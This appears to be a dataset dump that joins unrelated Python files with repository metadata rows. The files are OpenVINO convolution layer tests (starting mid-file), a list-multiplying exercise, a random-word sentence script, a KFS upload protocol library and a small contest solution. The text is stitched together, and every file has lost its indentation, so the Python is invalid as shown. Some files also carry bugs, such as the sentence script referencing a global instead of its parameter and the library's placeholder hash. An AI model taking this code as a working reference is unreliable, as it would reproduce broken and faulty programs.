def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv2d(torch.nn.Module):
def __init__(self):
super(aten_conv2d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv2d(), ref_net, "aten::conv2d"
@pytest.mark.parametrize("params",
[{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': [0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': [1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1,
'groups': 1},
{'weights_shape': [3, 1, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv2d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv1D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25).astype(np.float32),)
def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv1d(torch.nn.Module):
def __init__(self):
super(aten_conv1d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv1d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv1d(), ref_net, "aten::conv1d"
@pytest.mark.parametrize("params",
[{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 1, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv1d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv3D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25, 25).astype(np.float32),)
def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv3d(torch.nn.Module):
def __init__(self):
super(aten_conv3d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv3d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv3d(), ref_net, "aten::conv3d"
@pytest.mark.parametrize("params",
[{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 0, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 1, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1,
'groups': 1},
{'weights_shape': [3, 1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv3d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv2DInSubgraph(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25).astype(np.float32), np.array([1], dtype=np.int32))
def convert_directly_via_frontend(self, model, example_input, trace_model, dynamic_shapes, ov_inputs, freeze_model):
# Overload function to allow reproduction of issue caused by additional freeze.
import torch
fe_manager = FrontEndManager()
fe = fe_manager.load_by_framework('pytorch')
model.eval()
with torch.no_grad():
if trace_model:
model = torch.jit.trace(model, example_input)
else:
model = torch.jit.script(model)
model = torch.jit.freeze(model)
print(model.inlined_graph)
decoder = TorchScriptPythonDecoder(model)
im = fe.load(decoder)
om = fe.convert(im)
self._resolve_input_shape_dtype(om, ov_inputs, dynamic_shapes)
return model, om
def create_model(self):
import torch
from torchvision.ops import Conv2dNormActivation
class aten_conv2d(torch.nn.Module):
def __init__(self):
super().__init__()
convs = []
conv_depth=2
for _ in range(conv_depth):
convs.append(Conv2dNormActivation(3, 3, 3, norm_layer=None))
self.convs = torch.nn.Sequential(*convs)
for layer in self.modules():
if isinstance(layer, torch.nn.Conv2d):
torch.nn.init.normal_(layer.weight) # type: ignore[arg-type]
torch.nn.init.constant_(layer.bias, 0) # type: ignore[arg-type]
def forward(self, x, y):
acc = self.convs(x)
if y:
acc += self.convs(x)
return acc
ref_net = None
return aten_conv2d(), ref_net, "aten::conv2d"
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv2d(self, ie_device, precision, ir_version):
self._test(*self.create_model(),
ie_device, precision, ir_version, freeze_model=True, dynamic_shapes=False)
| [
"[email protected]"
] | |
082ae04a5c36262e14182602b53ff46f5aa16fcf | 1f08436bab6cd03bcfb257e8e49405cbc265195a | /8_function/Sample/functions_ex3.py | 0b362e6fc10e31311f529f7db4e12747dd2833cc | [] | no_license | kuchunbk/PythonBasic | e3ba6322f256d577e37deff09c814c3a374b93b2 | a87135d7a98be8830d30acd750d84bcbf777280b | refs/heads/master | 2020-03-10T04:28:42.947308 | 2018-04-17T04:25:51 | 2018-04-17T04:25:51 | 129,192,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | '''Question:
Write a Python function to multiply all the numbers in a list.
'''
# Python code:
def multiply(numbers):
total = 1
for x in numbers:
total *= x
return total
print(multiply((8, 2, 3, -1, 7)))
'''Output sample:
-336
''' | [
"[email protected]"
] | |
1bee663d7c4ec53d0aae190aa76827e89a0ec34e | b65032c8b76dd2115fd37ae45669a44537ad9df4 | /Code/dictionary_words.py | a1ae64f3596492ec99008c0aa807de8a02d24fd2 | [] | no_license | reikamoon/CS-1.2-Intro-Data-Structures | a795dc8ca9e52f02cafb9d0782a80632bcc7b206 | 40b19ad8d93631bbdbd589fa95b0b3a7ec40b53a | refs/heads/master | 2022-12-22T00:22:05.667638 | 2019-12-11T20:45:11 | 2019-12-11T20:45:11 | 220,103,212 | 0 | 0 | null | 2022-12-08T06:16:43 | 2019-11-06T22:35:08 | Python | UTF-8 | Python | false | false | 642 | py | from random import randint
from os import sys
def get_words():
words = list()
with open('/usr/share/dict/words', 'r') as f:
words = f.read().split('\n')
return words
def random_words(integer_input, word_list):
sentence = str()
while integer_input > 0:
index = randint(0, len(words) - 1)
if integer_input == 1:
print("My Random Sentence:")
else:
sentence += word_list[index] + ' '
integer_input -= 1
return sentence
if __name__ == '__main__':
words = get_words()
integer_input = int(sys.argv[1])
print(random_words(integer_input, words))
| [
"[email protected]"
] | |
86ddec28dee78756b57aa131bc70d9140872cc04 | 08c5ee41d40f9f14a3c6c3cb48515ed8467845e3 | /python/kfs_lib.py | 6c10b5ce828b790d815030153018533c82f3b5b2 | [
"Apache-2.0"
] | permissive | fdgonthier/kas | 3f971bda691b8c6db7a6343ea419088d1ac10386 | c82a3723085cdd9fec25efca1209e62db09edd72 | refs/heads/master | 2021-01-17T21:38:07.362287 | 2013-08-14T20:54:08 | 2013-08-14T20:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,451 | py | import os, ConfigParser, hashlib, stat, struct, logging
# from kpython
import kbase
from kpg import *
from StringIO import StringIO
# local
import kanp
import kcd_client
from kcdpg import KCD_KWS_LOGIN_TYPE_KWMO
# KFS Constants.
KFS_CHUNK_SIZE = 256 * 1024
KFS_FILE = 1
KFS_DIR = 2
KFS_NODE_TYPES = [KFS_FILE, KFS_DIR]
KFS_STATUS_PENDING = 0
KFS_STATUS_OK = 1
KFS_STATUS_DELETED = 2
KFS_STATUSES = [KFS_STATUS_PENDING, KFS_STATUS_OK, KFS_STATUS_DELETED]
KFS_ROOT_INODE_ID = 0
KFS_ROOT_COMMIT_ID = 0
# Put after imports so log is not overwridden by an imported module.
log = logging.getLogger(__name__)
# Replace bad characters in a skurl email subject for directory creation.
def get_kfs_skurl_escaped_subject(s, replacement_char='_'):
allowed_chars = [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
]
new_s = ''
for c in s:
if allowed_chars[ord(c)] == 1:
new_s += c
else:
new_s += replacement_char
return new_s
# Convert a skurl email subject into a valid KFS directory.
def get_kfs_skurl_subject(date, subject):
d = time.strftime('%Y-%m-%d %Hh%Mm%S', time.gmtime(date))
if subject == '':
s = 'No subject'
else:
s = get_kfs_skurl_escaped_subject(subject)
s = s.strip()
return d + ' ' + s;
# This checks path and replace characters when needed so that the result is valid.
def kfs_convert_path_name(path_name):
invalid_words = [
"", "CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5",
"COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4",
"LPT5", "LPT6", "LPT7", "LPT8", "LPT9"
]
allowed_chars = [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
]
new_str = ""
# Replace "#".
path_name = path_name.replace("#", "#%03i" % ( ord("#") ) )
# Replace bad words. Return immediately the converted string if a bad word is found.
for invalid_word in invalid_words:
if path_name == invalid_word:
for char in path_name:
new_str += "#%03i" % ( ord(char) )
return new_str
# Replace bad characters.
for char in path_name:
if allowed_chars[ord(char)]:
new_str += char
else:
new_str += "#%03i" % ( ord(char) )
# Replace bad leading characters.
char = new_str[0:1]
if char == " ":
new_str = new_str[1:] + "#%03i" % ( ord(char) )
# Replace bad trailing characters.
char = new_str[-1:]
if char == ".":
new_str = new_str[:-1] + "#%03i" % ( ord(char) )
return new_str
# This class represents a Web KFS node.
class WebKFSNode(kbase.PropStore):
def __init__(self, workspace_id=None, share_id=None, inode_id=None):
self.workspace_id = workspace_id
self.share_id = share_id
self.inode_id = inode_id
def from_dict(self, d):
self.workspace_id = d['workspace_id']
self.share_id = d['share_id']
self.inode_id = d['inode_id']
return self
def __str__(self):
return "<%s ws_id=%s share_id=%s inode_id=%s>" % \
( self.__class__.__name__, str(self.workspace_id), str(self.share_id), str(self.inode_id) )
# This class represents a Web KFS directory.
class WebKFSDirectory(WebKFSNode):
pass
# This class represents a Web KFS file.
class WebKFSFile(WebKFSNode):
pass
# Represent a directory to delete (new style)
class KFSOpDirDelete(object):
# Accessible attributes
__slots__ = ['kfs_op', 'inode_id', 'commit_id', 'kfs_error']
def __init__(self, inode_id, commit_id):
self.kfs_op = kanp.KANP_KFS_OP_DELETE_DIR
self.inode_id = inode_id
self.commit_id = commit_id
self.kfs_error = None
# Represent a file to delete (new style).
class KFSOpFileDelete(object):
# Accessible attributes
__slots__ = ['kfs_op', 'inode_id', 'commit_id', 'kfs_error']
def __init__(self, inode_id, commit_id):
self.kfs_op = kanp.KANP_KFS_OP_DELETE_FILE
self.inode_id = inode_id
self.commit_id = commit_id
self.kfs_error = None
# NOT USED #
if 0:
# This class represents a KFS directory.
class KFSDirectory(kbase.PropStore):
def __init__(self):
self.workspace_id = 0
self.share_id = 0
self.inode = 0
self.parent_inode_id = 0
self.commit_id = 0
self.user_id = 0
self.date = 0
self.name = ''
self.kfs_error = None
# This class represents a KFS file.
class KFSFile(kbase.PropStore):
def __init__(self):
self.workspace_id = 0
self.share_id = 0
self.inode = 0
self.parent_inode_id = 0
self.commit_id = 0
self.user_id = 0
self.date = 0
self.size = 0
self.hash = None
self.name = ''
# NOT USED #
if 0:
# This class handles writing to a file.
class KFSFileWriter(object):
def __init__(self, file_path):
self._fd = None
self.file_path = file_path
log.debug("%s: instantiated with file path '%s'." % ( self.__class__.__name__, self.file_path ))
def open(self):
self._fd = os.open(self.file_path, os.O_RDWR|os.O_CREAT)
log.debug("%s: opened file '%s'." % ( self.__class__.__name__, self.file_path ))
def write(self, data):
os.write(self._fd, data)
# Do not uncomment!
#log.debug("%s: writing file %i bytes." % ( self.__class__.__name__, len(data) ))
def close(self):
os.close(self._fd)
log.debug("%s: closed file '%s'." % ( self.__class__.__name__, self.file_path ))
# This class represents a KFS uploaded file.
class KFSUploadFile(KFSFile):
def __init__(self):
KFSFile.__init__(self)
self.kfs_op = None
self.fd = None
self.chunks = []
self.kfs_error = None
# This method sets some attributes based on an open file descriptor.
def set_from_fd(self, fd, size=None):
self.chunks = []
# Get hash of file.
self.hash = "X"*16 #kfs_compute_hash(fd)
# Set fd and size.
self.fd = fd
self.size = size
if not size: self.size = os.fstat(fd)[stat.ST_SIZE]
# Virtually split the file in chunks.
offset=0
while offset < self.size:
remaining_bytes = self.size - offset
size = min(remaining_bytes, KFS_CHUNK_SIZE)
self.chunks += [KFSChunk(self.fd, offset, size)]
offset += size
# NOT USED #
if 0:
# This class represents a KFS downloaded file.
class KFSDownloadFile(KFSFile):
def __init__(self):
KFSFile.__init__(self)
self.hash = None
self.comm = None
self.kfs_error = None
# This class represents a KFS chunk.
class KFSChunk(object):
def __init__(self, fd, offset, size):
self.fd = fd
self.offset = offset
self.size = size
def read(self):
os.lseek(self.fd, self.offset, os.SEEK_SET)
s = ''
cur = 0
while cur < self.size:
remaining_bytes = self.size - cur
d = os.read(self.fd, remaining_bytes)
cur += len(d)
s += d
return s
def __repr__(self):
return "<%s fd=%i offset=%i size=%i>" % ( self.__class__.__name__, self.fd, self.offset, self.size )
class PhaseTwoCommitSubMessage(object):
def __init__(self):
self.size = 0
self.anpm = None
class PhaseTwoChunkSubMessage(object):
def __init__(self):
self.size = 0
self.anpm = None
self.chunk = None
class PhaseTwoMessage(object):
def __init__(self):
self.size = 0
self.sub_messages = []
self.anpm = None
# This class handles KFS operations like creating and updating files in KCD.
class KFSOperations(object):
def __init__(self, kfs_entries, reader, writer):
self.kfs_entries = kfs_entries
self.reader = reader
self.writer = writer
self.phase_two_messages = []
# Allows creating and updating files (need phase 2) or creating directories.
def phase_one(self, email_id, ticket):
# Prepare phase one ANP message.
m = kanp.ANP_msg()
m.add_bin(ticket)
m.add_u64(email_id)
m.add_u32(len(self.kfs_entries))
for kfs_entry in self.kfs_entries:
if kfs_entry.kfs_op == kanp.KANP_KFS_OP_CREATE_FILE:
m.add_u32(5) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.parent_inode_id)
m.add_u64(kfs_entry.parent_commit_id)
m.add_str(kfs_entry.name)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_UPDATE_FILE:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode)
m.add_u64(kfs_entry.commit_id)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_CREATE_DIR:
m.add_u32(5) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.parent_inode_id)
m.add_u64(kfs_entry.parent_commit_id)
m.add_str(kfs_entry.name)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_DELETE_DIR:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode_id)
m.add_u64(kfs_entry.commit_id)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_DELETE_FILE:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode_id)
m.add_u64(kfs_entry.commit_id)
else:
raise Exception("Unexpected KFS operation: '%s'." % ( str(kfs_entry.kfs_op) ) )
# Send phase one ANP message to KCD.
payload = m.get_payload()
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_1, len(payload))
self.writer.write(payload)
log.debug("Phase 1 data sent.")
# Get phase one result.
h, m = kanp.get_anpt_all(self.reader)
if h.type != kanp.KANP_RES_KFS_PHASE_1:
assert h.type == kanp.KANP_RES_FAIL
raise kanp.KANPFailure(m.get_u32(), m.get_str())
log.debug("Got phase 1 reply.")
# Handle phase one reply.
phase_two_needed = False
commit_id = m.get_u64()
nb_op = m.get_u32()
assert nb_op == len(self.kfs_entries)
for i in range(0, nb_op):
errno = m.get_u32()
error = m.get_str()
if error:
log.debug(
"Phase 1: KFS operation %i error: errno=%i, error='%s'" % \
( i, errno, error ))
self.kfs_entries[i].kfs_error = error
# This function prepares anp messages and sub-messages for phase_two().
# Knowing in advance the size of the files is needed for this function. See other methods for asynchronous uploads.
# NOTE: No longer used, might not be fully working.
def prepare_phase_two(self):
message = None
files_iter = iter(self.kfs_entries)
switch_file = True
switch_message = True
commit_file = False
switch_chunk = True
exit = False
while 1:
if exit or switch_message:
switch_message = False
if message and len(message.sub_messages) > 0:
# Finish ANPT message preparation.
message.anpm = kanp.ANP_msg()
message.anpm.add_u32(len(message.sub_messages))
message.size += message.anpm.get_payload_size()
# Append ANPT message to list.
self.phase_two_messages.append(message)
# Init new ANPT message.
message = PhaseTwoMessage()
if exit:
break
if commit_file:
commit_file = False
# Prepare a file commit sub-message.
log.debug("Committing file.")
# Prepare a partial anp message (missing an ANP bin field for the MD5 signature of the file).
subm = PhaseTwoCommitSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_COMMIT)
#hash = kfs_compute_hash(kfs_entry.fd)
#subm.anpm.add_bin(kfs_entry.hash)
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size() + 5 + 16 # partial anp mesg + anp bin header + md5 sign.
log.debug("Commit sub-message has %i bytes in total." % ( subm.size ))
# Append sub-message to current ANPT message.
log.debug("Appending commit sub-message to ANPT message.")
message.sub_messages.append(subm)
message.size += subm.size
# Switch to next file.
switch_file = True
continue
if not message:
# Init new message.
log.debug("Initiating a new message.")
message = PhaseTwoMessage()
if switch_file:
switch_file = False
try:
# Get next file.
kfs_entry = files_iter.next()
log.debug("Got new file: '%s'." % ( kfs_entry.name ))
# Start again with file chunk.
chunks_iter = iter(kfs_entry.chunks)
switch_chunk = True
continue
except StopIteration:
# No more file in list.
log.debug("No more file.")
exit = True
continue
if kfs_entry.kfs_op != kanp.KANP_KFS_OP_CREATE_FILE and kfs_entry.kfs_op != kanp.KANP_KFS_OP_UPDATE_FILE:
# That operation does not need any phase 2 messsage.
log.debug("No phase two needed for that operation.")
switch_file = True
continue
if kfs_entry.kfs_error:
# This file cannot be uploaded. Pass to next file.
log.debug("Skipping file '%s' because it had an error in phase 1: '%s'." % \
(kfs_entry.name, kfs_entry.kfs_error ))
switch_file = True
continue
if switch_chunk:
switch_chunk = False
try:
# Get next KFS file chunk.
chunk = chunks_iter.next()
log.debug("Got a new chunk of %i bytes." % ( chunk.size ))
except StopIteration:
# No more chunks. Commit file.
commit_file = True
continue
# Add chunk to current ANPT message.
# Prepare a partial anp message (missing an ANP bin field for the chunk data).
subm = PhaseTwoChunkSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_CHUNK)
#subm.anpm.add_bin(chunk.read())
# Set sub-message chunk.
subm.chunk = chunk
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size() + 5 + chunk.size # partial anp mesg + anp bin header + chunk data
log.debug("Chunk sub-message has %i bytes in total." % ( subm.size ))
if (message.size + subm.size + 100000) > kanp.ANPT_MSG_MAX_SIZE:
# Current ANPT message cannot accept chunk.
# Switch ANPT message.
switch_message = True
# Do not switch chunk (implicit).
#switch_chunk = False
continue
# Append sub-message to this message.
log.debug("Appending chunk sub-message to ANPT message.")
message.sub_messages.append(subm)
message.size += subm.size
switch_chunk = True
# This function handles the phase two communications, after messages are prepared in prepare_phase_two().
# NOTE: No longer used, might not be fully working.
def phase_two(self):
hash = None
i = -1
for message in self.phase_two_messages:
i += 1
# Sent ANP transport header
log.debug("Phase 2: sending ANPT header %i, size %i." % ( i, message.size ))
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_2, message.size)
log.debug("Phase 2: sent ANPT header %i, size %i." % ( i, message.size ))
# Send base message anp message.
kanp.send_anpt_msg(self.writer, message.anpm)
if not hash:
hash = hashlib.md5()
j = -1
for subm in message.sub_messages:
j += 1
if isinstance(subm, PhaseTwoChunkSubMessage):
# send chunk
log.debug("Phase 2: preparing file %i chunk %i anp message." % ( i, j ))
bytes = subm.chunk.read()
hash.update(bytes)
subm.anpm.add_bin(bytes)
log.debug("Phase 2: sending file %i chunk %i anp message." % ( i, j ))
kanp.send_anpt_msg(self.writer, subm.anpm)
log.debug("Phase 2: sent file %i chunk %i anp message." % ( i, j ))
else:
assert isinstance(subm, PhaseTwoCommitSubMessage)
# send commit
log.debug("Phase 2: preparing file %i commit anp message." % ( i ))
bytes = hash.digest()
subm.anpm.add_bin(bytes)
hash = hashlib.md5()
log.debug("Phase 2: sending file %i commit anp message." % ( i ))
kanp.send_anpt_msg(self.writer, subm.anpm)
log.debug("Phase 2: sent file %i commit anp message." % ( i ))
# get response
log.debug("Phase 2: getting %i reply." % ( i ))
h, m = kanp.get_anpt_all(self.reader)
log.debug("Phase 2: got %i reply." % ( i ))
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
# get response
h, m = kanp.get_anpt_all(self.reader)
log.debug("Phase 2: got final reply.")
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
log.debug("File upload finished.")
#return kfs_entries
# Create a phase 2 chunk sub-message.
def phase_2_create_chunk_submessage(self, data):
# Prepare anp message
subm = PhaseTwoChunkSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_CHUNK)
subm.anpm.add_bin(data)
return subm
# Create a phase 2 commit sub-message.
def phase_2_create_commit_submessage(self, hash):
subm = PhaseTwoCommitSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_COMMIT)
subm.anpm.add_bin(hash)
return subm
# Send a phase 2 message with only 1 submessage
# (for asynchronous uploads when file(s) size(s) is/are not yet known...).
def phase_2_send_message_with_one_submessage(self, subm):
# Prepare ANP message.
message = PhaseTwoMessage()
message.anpm = kanp.ANP_msg()
message.anpm.add_u32(1) # Send only one sub-message
# Calculate base messasge size.
message.size = message.anpm.get_payload_size()
#log.debug("Base message size: %i bytes." % ( message.size ))
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size()
log.debug("Chunk sub-message size: %i bytes." % ( subm.size ))
total_size = message.size + subm.size
# Sent ANP transport header
#log.debug("Phase 2: sending ANPT header with data size %i." % ( total_size ))
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_2, total_size)
#log.debug("Phase 2: sent ANPT header, size %i." % ( total_size ))
# Send base message.
kanp.send_anpt_msg(self.writer, message.anpm)
# Send sub-message.
kanp.send_anpt_msg(self.writer, subm.anpm)
# get response
#log.debug("Phase 2: getting reply.")
h, m = kanp.get_anpt_all(self.reader)
#log.debug("ANP RESPONSE DUMP: %s" % (str(m.dump())))
#log.debug("Phase 2: got reply.")
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
def kfs_compute_hash(fd):
os.lseek(fd, 0, 0)
hash = hashlib.md5()
while 1:
data = os.read(fd, 1024*1024)
if len(data) == 0: break
hash.update(data)
return hash.digest()
| [
"[email protected]"
] | |
4c59bf2329fd1567caddbca76105185740dad7e5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s680269618.py | 10f62cd0a31d38e548bfb5cbca9157ed13e880b2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | S = input()
if S[0] == S[1] and S[2] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[2] and S[1] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[3] and S[1] == S[2] and len(set(S)) == 2:
print('Yes')
else:
print('No')
| [
"[email protected]"
] | |
